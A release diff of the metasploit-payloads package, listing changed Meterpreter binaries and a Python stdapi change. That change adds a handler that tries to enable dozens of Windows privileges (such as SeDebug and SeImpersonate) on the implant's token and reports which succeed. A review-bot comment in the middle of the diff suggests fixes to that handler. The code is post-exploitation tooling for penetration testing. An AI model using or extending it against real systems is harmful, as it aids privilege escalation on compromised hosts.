metasploit-payloads 2.0.110 → 2.0.111
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/data/android/meterpreter.jar +0 -0
- data/data/android/metstage.jar +0 -0
- data/data/android/shell.jar +0 -0
- data/data/meterpreter/elevator.x64.debug.dll +0 -0
- data/data/meterpreter/elevator.x64.dll +0 -0
- data/data/meterpreter/elevator.x86.debug.dll +0 -0
- data/data/meterpreter/elevator.x86.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.py +95 -7
- data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
- data/data/meterpreter/metsrv.x64.debug.dll +0 -0
- data/data/meterpreter/metsrv.x64.dll +0 -0
- data/data/meterpreter/metsrv.x86.debug.dll +0 -0
- data/data/meterpreter/metsrv.x86.dll +0 -0
- data/data/meterpreter/screenshot.x64.debug.dll +0 -0
- data/data/meterpreter/screenshot.x64.dll +0 -0
- data/data/meterpreter/screenshot.x86.debug.dll +0 -0
- data/data/meterpreter/screenshot.x86.dll +0 -0
- data/lib/metasploit-payloads/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +1 -1
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 7909c1b37004dee1af5bed7dbe25381e5a3fcaba7a7d0ee4101f5e518aef6a36
|
|
4
|
+
data.tar.gz: e438b3747393682ffe47594ce438ed27086781602b524071aa73c51f7477e07a
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: cda77751aa1547b93c6be12c0fe4fbedafa915bf5f34a1931d6bef4e44ad6c7c0a89a96fbe6b4878c050a196aa9fd6032800341a38826b5718d0fa3695772240
|
|
7
|
+
data.tar.gz: d40c9e8db0fd4d02e8f8e807fc26ce095b6703548de0c74cce5ad514a9082cee4ebe3b0010d4f2ab1b978d93c79c7184249540839e52f89b1b3bdb7bc8c594b4
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
|
Binary file
|
data/data/android/metstage.jar
CHANGED
|
Binary file
|
data/data/android/shell.jar
CHANGED
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
@@ -489,6 +489,7 @@ TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
|
|
|
489
489
|
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
|
|
490
490
|
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
|
|
491
491
|
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
|
|
492
|
+
TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632
|
|
492
493
|
|
|
493
494
|
##
|
|
494
495
|
# Fs
|
|
@@ -749,6 +750,25 @@ VER_PLATFORM_WIN32s = 0x0000
|
|
|
749
750
|
VER_PLATFORM_WIN32_WINDOWS = 0x0001
|
|
750
751
|
VER_PLATFORM_WIN32_NT = 0x0002
|
|
751
752
|
|
|
753
|
+
# Token Constants
|
|
754
|
+
TOKEN_ASSIGN_PRIMARY = 0x0001
|
|
755
|
+
TOKEN_DUPLICATE = 0x0002
|
|
756
|
+
TOKEN_IMPERSONATE = 0x0004
|
|
757
|
+
TOKEN_QUERY = 0x0008
|
|
758
|
+
TOKEN_QUERY_SOURCE = 0x0010
|
|
759
|
+
TOKEN_ADJUST_PRIVILEGES = 0x0020
|
|
760
|
+
TOKEN_ADJUST_GROUPS = 0x0040
|
|
761
|
+
TOKEN_ADJUST_DEFAULT = 0x0080
|
|
762
|
+
TOKEN_ADJUST_SESSIONID = 0x0100
|
|
763
|
+
TOKEN_ALL_ACCESS = 0xf01ff
|
|
764
|
+
|
|
765
|
+
# Privilege Constants
|
|
766
|
+
DISABLED = 0x0
|
|
767
|
+
SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1
|
|
768
|
+
SE_PRIVILEGE_ENABLED = 0x2
|
|
769
|
+
SE_PRIVILEGE_REMOVED = 0x4
|
|
770
|
+
SE_PRIVILEGE_USED_FOR_ACCESS = 0x800000000
|
|
771
|
+
|
|
752
772
|
# Windows Access Controls
|
|
753
773
|
MAXIMUM_ALLOWED = 0x02000000
|
|
754
774
|
|
|
@@ -855,7 +875,6 @@ def get_stat_buffer(path):
|
|
|
855
875
|
return st_buf
|
|
856
876
|
|
|
857
877
|
def get_token_user(handle):
|
|
858
|
-
TOKEN_QUERY = 0x0008
|
|
859
878
|
TokenUser = 1
|
|
860
879
|
advapi32 = ctypes.windll.advapi32
|
|
861
880
|
advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
|
|
@@ -1054,9 +1073,6 @@ def windll_GetVersion():
|
|
|
1054
1073
|
return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
|
|
1055
1074
|
|
|
1056
1075
|
def enable_privilege(name, enable=True):
|
|
1057
|
-
TOKEN_ALL_ACCESS = 0xf01ff
|
|
1058
|
-
SE_PRIVILEGE_ENABLED = 0x00000002
|
|
1059
|
-
|
|
1060
1076
|
GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
|
|
1061
1077
|
GetCurrentProcess.restype = ctypes.c_void_p
|
|
1062
1078
|
|
|
@@ -1216,6 +1232,81 @@ def stdapi_sys_config_getuid(request, response):
|
|
|
1216
1232
|
response += tlv_pack(TLV_TYPE_USER_NAME, username)
|
|
1217
1233
|
return ERROR_SUCCESS, response
|
|
1218
1234
|
|
|
1235
|
+
@register_function_if(has_windll)
|
|
1236
|
+
def stdapi_sys_config_getprivs(request, response):
|
|
1237
|
+
GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
|
|
1238
|
+
GetCurrentProcess.restype = ctypes.c_void_p
|
|
1239
|
+
|
|
1240
|
+
advapi32 = ctypes.windll.advapi32
|
|
1241
|
+
OpenProcessToken = advapi32.OpenProcessToken
|
|
1242
|
+
OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
|
|
1243
|
+
OpenProcessToken.restype = ctypes.c_bool
|
|
1244
|
+
|
|
1245
|
+
LookupPrivilegeValue = advapi32.LookupPrivilegeValueW
|
|
1246
|
+
LookupPrivilegeValue.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.POINTER(LUID)]
|
|
1247
|
+
LookupPrivilegeValue.restype = ctypes.c_bool
|
|
1248
|
+
|
|
1249
|
+
AdjustTokenPrivileges = advapi32.AdjustTokenPrivileges
|
|
1250
|
+
AdjustTokenPrivileges.argtypes = [ctypes.c_void_p, ctypes.c_bool, PTOKEN_PRIVILEGES, ctypes.c_uint32, PTOKEN_PRIVILEGES, ctypes.POINTER(ctypes.c_uint32)]
|
|
1251
|
+
AdjustTokenPrivileges.restype = ctypes.c_bool
|
|
1252
|
+
|
|
1253
|
+
token = ctypes.c_void_p()
|
|
1254
|
+
success = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, token)
|
|
1255
|
+
if not success:
|
|
1256
|
+
return error_result_windows(), response
|
|
1257
|
+
|
|
1258
|
+
priv_list = [
|
|
1259
|
+
"SeAssignPrimaryTokenPrivilege",
|
|
1260
|
+
"SeAuditPrivilege",
|
|
1261
|
+
"SeBackupPrivilege",
|
|
1262
|
+
"SeChangeNotifyPrivilege",
|
|
1263
|
+
"SeCreatePagefilePrivilege",
|
|
1264
|
+
"SeCreatePermanentPrivilege",
|
|
1265
|
+
"SeCreateTokenPrivilege",
|
|
1266
|
+
"SeDebugPrivilege",
|
|
1267
|
+
"SeIncreaseBasePriorityPrivilege",
|
|
1268
|
+
"SeIncreaseQuotaPrivilege",
|
|
1269
|
+
"SeLoadDriverPrivilege",
|
|
1270
|
+
"SeLockMemoryPrivilege",
|
|
1271
|
+
"SeMachineAccountPrivilege",
|
|
1272
|
+
"SeProfileSingleProcessPrivilege",
|
|
1273
|
+
"SeRemoteShutdownPrivilege",
|
|
1274
|
+
"SeRestorePrivilege",
|
|
1275
|
+
"SeSecurityPrivilege",
|
|
1276
|
+
"SeShutdownPrivilege",
|
|
1277
|
+
"SeSystemEnvironmentPrivilege",
|
|
1278
|
+
"SeSystemProfilePrivilege",
|
|
1279
|
+
"SeSystemtimePrivilege",
|
|
1280
|
+
"SeTakeOwnershipPrivilege",
|
|
1281
|
+
"SeTcbPrivilege",
|
|
1282
|
+
"SeCreateGlobalPrivilege",
|
|
1283
|
+
"SeCreateSymbolicLinkPrivilege",
|
|
1284
|
+
"SeEnableDelegationPrivilege",
|
|
1285
|
+
"SeImpersonatePrivilege",
|
|
1286
|
+
"SeIncreaseWorkingSetPrivilege",
|
|
1287
|
+
"SeManageVolumePrivilege",
|
|
1288
|
+
"SeRelabelPrivilege",
|
|
1289
|
+
"SeSyncAgentPrivilege",
|
|
1290
|
+
"SeTimeZonePrivilege",
|
|
1291
|
+
"SeTrustedCredManAccessPrivilege",
|
|
1292
|
+
"SeDelegateSessionUserImpersonatePrivilege"
|
|
1293
|
+
]
|
|
1294
|
+
for privilege in priv_list:
|
|
1295
|
+
luid = LUID()
|
|
1296
|
+
name = ctypes.create_unicode_buffer(privilege)
|
|
1297
|
+
success = LookupPrivilegeValue(None, name, luid)
|
|
1298
|
+
if success:
|
|
1299
|
+
size = ctypes.sizeof(TOKEN_PRIVILEGES)
|
|
1300
|
+
size += ctypes.sizeof(LUID_AND_ATTRIBUTES)
|
|
1301
|
+
buffer = ctypes.create_string_buffer(size)
|
|
1302
|
+
tokenPrivileges = ctypes.cast(buffer, PTOKEN_PRIVILEGES).contents
|
|
1303
|
+
tokenPrivileges.PrivilegeCount = 1
|
|
1304
|
+
tokenPrivileges.get_array()[0].Luid = luid
|
|
1305
|
+
tokenPrivileges.get_array()[0].Attributes = SE_PRIVILEGE_ENABLED
|
|
1306
|
+
if AdjustTokenPrivileges(token, False, tokenPrivileges, 0, None, None):
|
|
1307
|
+
response += tlv_pack(TLV_TYPE_PRIVILEGE, privilege)
|
|
1308
|
+
return ERROR_SUCCESS, response
|
|
1309
|
+
|
|
1219
1310
|
@register_function
|
|
1220
1311
|
def stdapi_sys_config_localtime(request, response):
|
|
1221
1312
|
localtime = time.strftime("%Y-%m-%d %H:%M:%S %Z", time.localtime())
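Review bot: The token handle that OpenProcessToken fills in at the top of `stdapi_sys_config_getprivs` is never closed, so every call of the new handler leaks a handle; wrapping the privilege loop in try/finally and calling `CloseHandle(token)` fixes that. AdjustTokenPrivileges also returns TRUE when the token does not hold the privilege and only signals that through GetLastError() == ERROR_NOT_ALL_ASSIGNED (1300), so the `tlv_pack(TLV_TYPE_PRIVILEGE, privilege)` branch will report every name LookupPrivilegeValue can resolve rather than the privileges actually enabled on the token; checking the last error before packing the TLV corrects the reporting (reading it via `ctypes.get_last_error()` on a `use_last_error=True` WinDLL is more reliable than calling kernel32.GetLastError after Python has run, but the latter matches how the file appears to read errors today). Define `ERROR_NOT_ALL_ASSIGNED = 1300` next to the new token constants, and give the function a docstring saying it attempts to enable each privilege and reports the ones that took, since "getprivs" reads like a pure query. In the constants hunk, `SE_PRIVILEGE_USED_FOR_ACCESS = 0x800000000` has one zero too many; winnt.h defines it as `0x80000000`.
```python
def stdapi_sys_config_getprivs(request, response):
    # ... unchanged: GetCurrentProcess / OpenProcessToken / LookupPrivilegeValue / AdjustTokenPrivileges prototypes ...
    kernel32 = ctypes.windll.kernel32
    CloseHandle = kernel32.CloseHandle
    CloseHandle.argtypes = [ctypes.c_void_p]
    CloseHandle.restype = ctypes.c_bool
    GetLastError = kernel32.GetLastError
    GetLastError.restype = ctypes.c_uint32

    token = ctypes.c_void_p()
    success = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, token)
    if not success:
        return error_result_windows(), response
    try:
        # ... unchanged: priv_list ...
        for privilege in priv_list:
            # ... unchanged: LookupPrivilegeValue and TOKEN_PRIVILEGES buffer setup ...
            if success:
                if AdjustTokenPrivileges(token, False, tokenPrivileges, 0, None, None):
                    # TRUE is also returned when the token does not hold the
                    # privilege; ERROR_NOT_ALL_ASSIGNED is the real verdict
                    if GetLastError() != ERROR_NOT_ALL_ASSIGNED:
                        response += tlv_pack(TLV_TYPE_PRIVILEGE, privilege)
    finally:
        # the handle is process-local and must be released on every path
        CloseHandle(token)
    return ERROR_SUCCESS, response
```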
|
|
@@ -1374,8 +1465,6 @@ def stdapi_sys_process_get_processes_via_ps(request, response):
|
|
|
1374
1465
|
|
|
1375
1466
|
def stdapi_sys_process_get_processes_via_windll(request, response):
|
|
1376
1467
|
TH32CS_SNAPPROCESS = 2
|
|
1377
|
-
TOKEN_QUERY = 0x0008
|
|
1378
|
-
TokenUser = 1
|
|
1379
1468
|
k32 = ctypes.windll.kernel32
|
|
1380
1469
|
pe32 = PROCESSENTRY32()
|
|
1381
1470
|
pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
|
|
@@ -1435,7 +1524,6 @@ def stdapi_sys_process_get_processes(request, response):
|
|
|
1435
1524
|
return stdapi_sys_process_get_processes_via_windll(request, response)
|
|
1436
1525
|
else:
|
|
1437
1526
|
return stdapi_sys_process_get_processes_via_ps(request, response)
|
|
1438
|
-
return ERROR_FAILURE, response
|
|
1439
1527
|
|
|
1440
1528
|
@register_function_if(has_windll)
|
|
1441
1529
|
def stdapi_sys_power_exitwindows(request, response):
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
metadata
CHANGED
metadata.gz.sig
CHANGED
|
Binary file
|